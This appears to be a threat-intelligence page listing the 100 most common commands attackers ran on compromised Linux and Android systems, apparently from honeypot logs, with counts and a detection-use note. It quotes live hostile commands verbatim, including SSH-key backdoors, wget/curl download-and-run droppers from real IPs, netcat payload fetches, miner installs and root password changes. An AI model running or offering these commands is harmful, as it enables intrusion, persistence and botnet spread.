TROYANOSYVIRUS
Updated: December 2025

Top 100 Malicious Commands

Most executed commands by attackers after gaining system access. Useful for intrusion detection and incident response.

8,710 commands in 24h
1.
$lockr -ia .ssh
171 IPs453x
2.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
171 IPs453x
3.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
169 IPs449x
4.
$cat /proc/cpuinfo | grep name | wc -l
143 IPs359x
5.
$uname -a
149 IPs358x
6.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
142 IPs355x
7.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
146 IPs355x
8.
$lscpu | grep Model
146 IPs354x
9.
$uname
144 IPs353x
10.
$which ls
142 IPs352x
11.
$ls -lh $(which ls)
142 IPs352x
12.
$whoami
145 IPs352x
13.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
142 IPs352x
14.
$top
142 IPs351x
15.
$crontab -l
141 IPs349x
16.
$uname -m
142 IPs348x
17.
$cat /proc/cpuinfo | grep model | grep name | wc -l
141 IPs347x
18.
$w
140 IPs344x
19.
$Enter new UNIX password:
121 IPs228x
20.
$Enter new UNIX password:
121 IPs228x
21.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
35 IPs148x
22.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
87 IPs130x
23.
$uname -s -v -n -m 2 > /dev/null
51 IPs122x
24.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
51 IPs122x
25.
$uname -s -v -n -r -m
21 IPs96x
26.
$uname -m 2 > /dev/null
35 IPs74x
27.
$/bin/./uname -s -v -n -r -m
13 IPs55x
28.
$cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd
1 IPs32x
29.
$echo SCANNER_TEST
15 IPs18x
30.
$cd /data/local/tmp/; busybox wget http://31.97.147.189/w.sh; sh w.sh; curl http://31.97.147.189/c.sh; sh c.sh; wget http://31.97.147.189/wget.sh; sh wget.sh; curl http://31.97.147.189/wget.sh; sh wget.sh; busybox wget http://31.97.147.189/wget.sh; sh wget.sh; busybox curl http://31.97.147.189/wget.sh; sh wget.sh
2 IPs17x
31.
$uname -s -v -n -r-m
2 IPs12x
32.
$shell
5 IPs10x
33.
$system
5 IPs10x
34.
$cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
2 IPs9x
35.
$q
4 IPs8x
36.
$pm path com.ufo.miner
4 IPs7x
37.
$curl2
1 IPs7x
38.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs7x
39.
$uname -s -m
7 IPs7x
40.
$rm -rf /data/local/tmp/*
3 IPs7x
41.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs7x
42.
$sh
5 IPs5x
43.
$fi
2 IPs5x
44.
$enable
5 IPs5x
45.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
4 IPs4x
46.
$cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;
1 IPs4x
47.
$while read i
4 IPs4x
48.
$then
1 IPs4x
49.
$rm .s; exit
4 IPs4x
50.
$Accept-Encoding: gzip
2 IPs4x
51.
$chmod 0755 /data/local/tmp/nohup
2 IPs3x
52.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs3x
53.
$ps | grep trinity
2 IPs3x
54.
$echo SHELL_TEST
2 IPs3x
55.
$nproc
1 IPs2x
56.
$/data/local/tmp/nohup /data/local/tmp/trinity
1 IPs2x
57.
$am start -n com.google.home.tv/com.example.test.MainActivity
1 IPs2x
58.
$chmod 0755 /data/local/tmp/trinity
1 IPs2x
59.
$Accept: */*
1 IPs2x
60.
$rm /data/local/tmp/ufo.apk
2 IPs2x
61.
$rm -f /data/local/tmp/ufo.apk
1 IPs2x
62.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
63.
$lspci | egrep -i nvidia | amd | grep -e VGA -e 3D | wc -l
1 IPs2x
64.
$lspci | egrep -i nvidia|amd | grep -e VGA -e 3D | wc -l
1 IPs2x
65.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
1 IPs2x
66.
$if [ [ ! -d ${HOME}/.ssh ] ]
1 IPs2x
67.
$ps | grep log
1 IPs2x
68.
$cd /data/local/tmp/; busybox wget http://213.202.211.46/w.sh; sh w.sh; curl http://213.202.211.46/c.sh; sh c.sh; wget http://213.202.211.46/wget.sh; sh wget.sh; curl http://213.202.211.46/wget.sh; sh wget.sh; busybox wget http://213.202.211.46/wget.sh; sh wget.sh; busybox curl http://213.202.211.46/wget.sh; sh wget.sh
1 IPs2x
69.
$else
1 IPs2x
70.
$echo "root:5H2Qyrl6Y2mW"|chpasswd|bash
2 IPs2x
71.
$echo "root:6kzsHk8OZHZa"|chpasswd|bash
2 IPs2x
72.
$if [ 0 -eq 0 ]
1 IPs2x
73.
$ps | grep rig
1 IPs2x
74.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
75.
$echo "123456\nKdrUwILDULDh\nKdrUwILDULDh\n"|passwd
1 IPs1x
76.
$echo "123456\nHhIwZmxckf0G\nHhIwZmxckf0G\n"|passwd
1 IPs1x
77.
$cat /proc/mounts; /bin/busybox NMYXY
1 IPs1x
78.
$echo "123456\n7oeF57BcCpuc\n7oeF57BcCpuc\n"|passwd
1 IPs1x
79.
$echo "123456\n0sJeGrjeFrAK\n0sJeGrjeFrAK\n"|passwd
1 IPs1x
80.
$cat /proc/mounts; /bin/busybox MKKGO
1 IPs1x
81.
$echo "12345678\nAGIOxFpKmzKc\nAGIOxFpKmzKc\n"|passwd
1 IPs1x
82.
$echo "123123\nvGdjAUCY8Zhg\nvGdjAUCY8Zhg\n"|passwd
1 IPs1x
83.
$cat /proc/mounts; /bin/busybox KUQDM
1 IPs1x
84.
$echo "123123\nRl0K6b9pzdSi\nRl0K6b9pzdSi\n"|passwd
1 IPs1x
85.
$cat /proc/mounts; /bin/busybox KKIVX
1 IPs1x
86.
$Intel Mac OS X 10_15_7
1 IPs1x
87.
$cat /proc/mounts; /bin/busybox BHKVR
1 IPs1x
88.
$echo "1\nr9gdtPvBZ4uN\nr9gdtPvBZ4uN\n"|passwd
1 IPs1x
89.
$chmod 0755 /data/local/tmp/log
1 IPs1x
90.
$echo "1\noF9VyBacMV3f\noF9VyBacMV3f\n"|passwd
1 IPs1x
91.
$echo "1\nnyBg0TzQXueg\nnyBg0TzQXueg\n"|passwd
1 IPs1x
92.
$chmod +x ./.797392456851139211/sshd;nohup ./.797392456851139211/sshd 103.145.145.79 109.176.202.12 101.91.114.194 95.214.181.29 111.203.190.237 122.225.202.150 103.228.170.105 89.169.12.61 101.36.228.201 83.142.209.109 50.6.172.32 82.26.91.241 50.6.4.160 158.51.96.38 115.231.181.61 103.145.145.73 47.100.213.47 115.239.255.196 103.218.243.223 121.137.217.242 177.70.2.194 45.81.23.49 27.148.182.148 156.254.3.130 103.145.145.82 45.129.183.157 106.75.29.239 103.214.112.63 2.189.86.111 123.54.197.60
1 IPs1x
93.
$Chrome/126.0.0.0 Safari/537.36
1 IPs1x
94.
$/data/local/tmp/nohup /data/local/tmp/log
1 IPs1x
95.
$/bin/busybox KKIVX
1 IPs1x
96.
$echo "1\noEqlMcyGVcaw\noEqlMcyGVcaw\n"|passwd
1 IPs1x
97.
$echo "1\nf0FjM6lnFlbn\nf0FjM6lnFlbn\n"|passwd
1 IPs1x
98.
$echo "1\nr6KmVjHZNqig\nr6KmVjHZNqig\n"|passwd
1 IPs1x
99.
$echo "1\nW0jCDx0eKJpP\nW0jCDx0eKJpP\n"|passwd
1 IPs1x
100.
$chmod +x ./.5019559907050924016/sshd;nohup ./.5019559907050924016/sshd 106.13.58.88 156.254.3.130 103.145.145.82 154.211.13.102 60.205.152.248 72.60.102.102 119.96.62.55 36.163.199.18 43.163.220.159 156.238.231.2 179.189.229.2 223.75.204.39 190.123.74.50 8.245.24.52 107.175.159.248 115.50.78.147 103.174.130.65 188.166.211.175 189.230.100.92 8.211.165.95 77.110.112.138 103.145.145.78 39.96.223.182 89.42.199.69 123.178.171.238 138.197.163.192 178.128.253.94 180.163.61.238 151.234.162.15 125.124.10
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions.